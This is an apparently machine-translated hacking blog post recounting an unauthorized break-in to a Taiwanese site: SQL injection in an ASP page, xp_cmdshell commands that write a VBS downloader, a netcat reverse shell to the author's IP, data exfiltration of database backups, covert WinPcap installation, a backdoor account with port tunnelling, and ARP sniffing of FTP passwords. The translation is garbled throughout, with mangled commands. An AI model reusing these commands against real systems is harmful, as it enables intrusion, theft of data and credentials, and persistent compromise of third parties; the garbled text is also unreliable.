Source: Security
a long time since China invaded, hand itchy, casually visiting the site of several TW value of looking for a little site to play, then found this site.
Customary, in the ; Registration Account ; the previous quotes.
/ rdshow / modify.asp, line 5
injection vulnerability appears to exist, and to see how the permissions. continued on the landing port input r and user> 0 and lr = r, the problem appears: Unable to complete input. website seems to limit the input length to do this difficult than me. save the page, change the page's source code in two places, one is the Action = modify.asp into Action =
SQL Server in the Microsoft OLE DB Provider (0x80040E07)
nvarchar value ' dbo ' will convert the data int data type for the line syntax error.
/ rdshow / modify.asp, line 5
seems formerly known, but this into too much trouble. take a look at page source code injection vulnerability if the URL into the form into the more convenient way. At the same time there is a good transformation advantage is that you can use the injection NBSI like tools, greatly simplify our injection process. transformed the URL for the modify.asp? bidno = fuck. WEB and SQL are now many cases of separation of the host, first we take a look The IP address of the database right. Open Skynet, and then in IE submission:
master.dbo.xp_shellr ping myipr; -
Skynet alarm log from the IP address of the database to see 210.208.xxx.253, re-Ping www.xxx.org.tw, get IP address but for 210.208.xxx.32, it seems not the same database and the WEB server host, but from the IP distribution, the two hosts in the same network segment, Under the theory as long as we can capture the database host, to penetrate to the WEB server is not difficult (later to be the case). to this point, I would first scan the database host using Superscan what port to open it.
Tips: first scan of the database server has a lot of benefits, such as to detect whether the other side to open a firewall, FTP or WEB services if, in order to determine how to inject the next step.
scans the database have a firewall, I was thinking first upload a NC up, first get a reverse Shell say. I've tried many ways to pass up before, first with no success Tftp, FTP did not succeed. If the database is a WEB service, then you can write a WebShell, unfortunately no. no choice but to write Iget.vbs (script kiddies: Advertising Time! black anti-download system last month, opening the download, the address is www.hacker.com.cn / downweb / index.asp, there is also some Little things are pretty good, welcome to download and use, and recommend you think there are features of the program functions), and then let the other WEB server to download my NC. well, after the decision to do so, continue to submit in IE:
master.dbo.xp_cmdshell ' echo iLocal = LCase (WScript.Arguments (1))> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo iRemote = LCase (WScript.Arguments (0))>> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo Set xPost = CreateObject (Microsoft.XMLHTTP > c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo xPost.Send ()>> c: winnt system p.vbs & apos ;;--< br> master.dbo.xp_cmdshell ' echo Set sGet = CreateObject (br> master.dbo.xp_cmdshell ' echo sGet.Mode = 3>> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo sGet. Type = 1>> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo sGet.Open ()>> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo sGet.Write (xPost.responseBody)>> c: winnt system p.vbs '; -
master.dbo.xp_cmdshell ' echo sGet.SaveToFile iLocal, 2>> c: winnt system p.vbs '; -
Now NBSI2 please come out with its own with the NB command command to view a successful VBS is written (with NB TreeList directory listing tools can be, but we have to wait a long time to wait for the results of my quick temper, so I chose the former).
generated can be seen VBS successful, now we can use this VBS to download backdoor Trojans and the like things. did not talk much, said first Tlist, NC, Kill pass go again, IE continues to submit the following URL:
master.dbo.xp_cmdshell & ; apos; c: winnt system p.vbs nc.exe '; -
master.dbo.xp_cmdshell ' c: winnt system p.vbs kill.exe ' ; -
master.dbo.xp_cmdshell ' c: winnt system p.vbs tlist.exe '; -
Now we can upload to get a reverse NC Shell, the first in the machine listening on port 8000 NC:
Nc.exe nl nv np 8000
IE then enter:
master.dbo.xp_cmdshell ' c: winnt system nc.exe ne cmd.exe myip 8000 '; -
so we had to get a CmdShell.
Tlist why I want to upload? Because I want to know what each other is to use antivirus software so that we can be targeted, and will not upload the stuff we were all killing. From Another reason is that Tlist I just started to bypass the firewall when the other is called FTP, in order to prevent the other suspect, I Kill it out to be, so have to upload to see PID No. Tlist. Tlist result is the other side with the Norton.
Tip: Get to the other system's antivirus software after the invasion is very helpful, because different anti-virus software on a different definition of the signature soft black is not the same, that is not some black soft Jinshan Avira, Norton does not mean you can pull a fast one and vice versa.
dizzy, my dishes, Rising only to find the signature, Norton not to be found, want to pass up the idea of a few Trojans rebound to give up. up a slip of the D-ring found in many of the following database backup, I like first to say Down down. But new problems came again, Tftp, and TTP can not be used, other have a hardware firewall, and Iget.vbs and can only be downloaded, there is no way to upload things can upload Trojans rebound, but the other side I have antivirus software hh the idea of starting trouble, is when I do nothing I think about food brother, he should have got some good stuff I can solve this problem, right? to say about the situation to him, he laughed his back to me after three times He himself wrote a little tool: HttpPut, this tool can be each other's files to their computer up, simple and convenient. use methods:
Useag: E: HttpPut.exe [URL] [PutFilePath]
Sample: E: HttpPut.exe c: p.txt
first pass a few Word files, everything is normal, but when I reached the back of a large database file only to find less stable, Shell is easy hang up, try to have so many times (Khan, then the process of which more than X months Cmd.exe, but fortunately I uploaded Tlist and Kill, the CMD those hung Kill off one by one).
and one in trouble, I wanted to go to major hacking sites to find the latest Trojans rebound, but God happens against me, looking for a long time can not find a satisfactory. I am almost in despair when suddenly my eyes light up: NC does not break through the firewall can transfer files? or how to call the Swiss Army knife? seems I was looking for ass donkey. In NC, which had advanced applications of the method of transfer files, the specific order is as follows:
nc -vv-l-p port> pathfile
nc-d myip port first command is input in the machine, here to note is the newly opened port is not occupied, the first two orders the implementation of the chicken, we can look at my results of the implementation.
normal transmission of the file, and quite stable, it appears that NC really good. Database downloaded successfully, but our task is not completed, although a so simple to use Arpsniffer, you must install WinPcap, WinPcap is the graphical problem is the program interface to the command line to install a tough one really have to spend a lot of rookie had a headache here. I was simply how to tell you about the command line Winpcap installed it, the specific method is as follows:
to WinPcap 3.0a, for example, by comparing the installed file system and registry before and after snapshot, it is easy to understand the entire installation process. remove the uninstall part, there are three key documents: Wpcap.dll, Packet.dll and Npf.sys. The first two files in the System32 directory, the third in the System32 drivers under the registry change is the addition of a system service NPF. note that the system services (ie driver) is not a Win32 service.
as a system service, not only in the HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Services to increase the primary key, but also in the HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Enum Root to increase the primary key, and the latter as the default only SYSTEM it can be modified. Fortunately it does not need to manually add, Winpcap will automatically get called, or even without having to manually modify the registry, all the things Winpcap will yourself, simply copy the three files to the appropriate location on the line the.
as an example, or demonstrate how to modify the registry, in fact, can be achieved by Inf file will be saved as _wpcap_.inf the following file contents:
[Version]
Signature = WINDOWS NT $ > ErrorControl = 1
ServiceBinary =% 12% npf.sys
write a batch _wpcap_.bat:
rundll32.exe setupapi, InstallHinfSection DefaultInstall 128% CD% _wpcap_.inf
del _wpcap_.inf
if / i% CD% ==% SYSTEMROOT% system32 goto COPYDRV
copy packet.dll% SYSTEMROOT% system32
copy wpcap.dll% SYSTEMROOT% system32
del packet.dll
del wpcap.dll
: COPYDRV
if / i% CD% ==% SYSTEMROOT% system32 drivers goto END
copy npf.sys% SYSTEMROOT% system32 drivers
del npf.sys
: END
del% 0
all the files and then use Winrar (5) packaged as a self-extracting exe, and item the idea of a more simple and convenient, is open to the database host Terminal Services, so that both the net inward transfer or continue what will be a lot easier to infiltrate. we may ask if you have permission to add accounts able to open the terminal services, but the other has a firewall how do you connect ah. Oh, the problems are solved, I believe we all know it VIDC type of software, the role of such software within the network is to map ports to IP Port onto the public network, so we only need to connect the public network The IP to connect to the nets. Here I use yyc VIDC written a modified version of the software,
Tips: yyc VIDC written a modified version of the software sub-client and server side, server-side Idc . exe in the broiler with a public network IP to run on the default port 8080 communications.
directly in the chicken run to OK, the client vIDCc.exe, vIDCc.DLL, xl.ini files, according to the configuration INI file automatic connection to bind to port, INI reads as follows:
Serverip = public network IP
Serverport = 8080
Cip = 127.0.0.1
Bport = 21 | 80 | 3389
Yport = 7779 | 7776 | 7778
first or use Iget.vbs pass these things up, and then add an account in the CmdShell inside, and then write a BAT open 3389, and other computer restart after running vIDCc.exe.OK done up, we just landed Broiler 7778 port to access the data within the network.
Oh, now we can install Winpcap the graphical interface, we have complete control of the database, but the task has not finished, we first sniff to see if you can WEB server. first execute the following command:
tracert 210.208.xxx.32 (WEB server address)
return results seem to see Me and, installed Winpcap, then start ArpSniffer, Sniffing the command:
Usage: ArpSniffer [/ RESET]
here I was listening on port 21, the command is as follows:
Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c: winnt system pass.txt 1
next step is to wait, but hurry smelly beggar reminder article, so If we can not post the results as if you are interested, I'll tell you next. the simple task The end of the next issue, see!
No comments:
Post a Comment